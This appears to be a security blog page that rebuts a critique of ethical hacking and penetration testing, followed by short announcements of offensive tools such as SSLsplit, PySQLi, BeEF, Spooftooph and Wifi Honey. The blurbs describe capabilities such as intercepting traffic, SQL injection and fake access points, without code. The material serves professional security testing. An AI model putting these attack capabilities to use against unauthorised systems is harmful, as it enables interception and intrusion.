— Now, here’s a statement that I largely agree with. It’s not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this, standard you can easily see that it’s not just another shot in the dark or empty effort - http://www.pentest-standard.org/index.php/FAQ. Standardizing how a penetration test (or ethical hack, these should be the same thing in my mind). Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it’s like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I’ve heard some call Red Team exercises “closer to what an actual attacker would behave like”, your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you’ll get high grade talent. If you’re looking for a cheap penetration test your results will likely be vastly different because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what’s going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That’s the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Because tools look for patterns, and respond accordingly, there are times where a human can see an error message and understand what it’s implying, but the machine has no such ability. In spite of all of technology’s advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by that way software, do not think. This gives software a disadvantage over a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive vs proactive debate here. I don’t believe it’s productive to the post here, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”, ever. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a little caveat here, which is not talked about enough I don’t believe. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways — is this thing called scope, and time. Penetration testers, ethical hackers and whatever you want to call them are time-boxed. Rarely do you get an open-ended contract, or even in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are many, many, many ways to break in typically. Systems can be mis-configured, un-patched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
—Again, you’re dealing with some seriously amateur, bad people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also employees that don’t know better. So what if it works though, you still need to leverage that testing to show real-use-cases of how your defenses were easily penetrated for educational purposes. Record it. Highlight those employees who let that guy with the 4 coffee cups in his hands through the turnstile without asking for a badge…but do it constructively so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not, you’ve just had some terrible experiences I don’t believe are indicative of the wider industry. So since the rest of the article is based on this, I think we’re done here.

Pentoo 2013.0 RC1.1 Released

Pentoo is a security-focused live CD based on Gentoo It's basically a Gentoo install with lots of customized tools, customized kernel, and much more. Pentoo 2013.0 RC1.1 features : Changes saving CUDA/OpenCL Enhanced cracking software John the ripper Hashcat Suite of tools Kernel 3.7.5 and all needed patches for injection XFCE 4.10 All the latest tools and a responsive development team!

WAppEx v2.0 : Web Application exploitation Tool

WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum of security professionals to web application hobbyists in mind. It suggests a security assessment model which revolves around an extensible exploit database. Further, it complements the power with various tools required to perform all stages of a web application attack.

BlindElephant – Web Application Fingerprinting

During Black Hat USA 2010, Patrick Thomas presented a new web application fingerprinting tool called Blind Elephant. The BlindElephant Web Application Finger-printer attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast,

PwnPi v2.0 – A Pen Test Drop Box distro for the Raspberry Pi

PwnPi is a Linux-based penetration testing dropbox distribution for the Raspberry Pi. It currently has 114 network security tools pre-installed to aid the penetration tester. It is built on the debian squeeze image from the raspberry pi foundation’s website and uses Xfce as the window manager Login username and password is root:root Tools List: Download Here

SSLsplit v 0.4.5 – Man-in-the-middle attacks against SSL/TLS

SLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network

TXDNS v 2.2.1 – Aggressive multithreaded DNS digger

TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques: -- Typos: Mised, doouble and transposde keystrokes; -- TLD/ccSLD rotation; -- Dictionary attack; -- Full Brute-force attack: alpha, numeric or alphanumeric charsets. New features:

PySQLi – Python SQL injection framework

PySQLi is a python framework designed to exploit complex SQL injection vulnerabilities. It provides dedicated bricks that can be used to build advanced exploits or easily extended/improved to fit the case. PySQLi is thought to be easily modified and extended through derivated classes and to be able to inject into various ways such as command line, custom network protocols and even in

Joomscan updated – now can identify 673 joomla vulnerabilities

Security Team Web-Center just released an updated for Joomscan Security Scanner. The new database Have 673 joomla vulnerabilities Joomla! is probably the most widely-used CMS out there due to its flexibility, user friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web

BeEF 0.4.3.8 – Browser Exploitation Framework

The Browser Exploitation Framework (BeEF) is a powerful professional security tool. It is a penetration testing tool that focuses on the web browser. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors.  Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a

Spooftooph 0.5.2 – Automated spoofing or cloning Bluetooth device

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specificaly the same Address).

Wifi Honey – Creates fake APs using all encryption

This is a script, attack can use to creates fake APs using all encryption and monitors with Airodump. It automate the setup process, it creates five monitor mode interfaces, four are used as APs and the fifth is used for airdump-ng. To make things easier, rather than having five windows all this is done in a screen session which allows you to switch between screens to see what is going on. All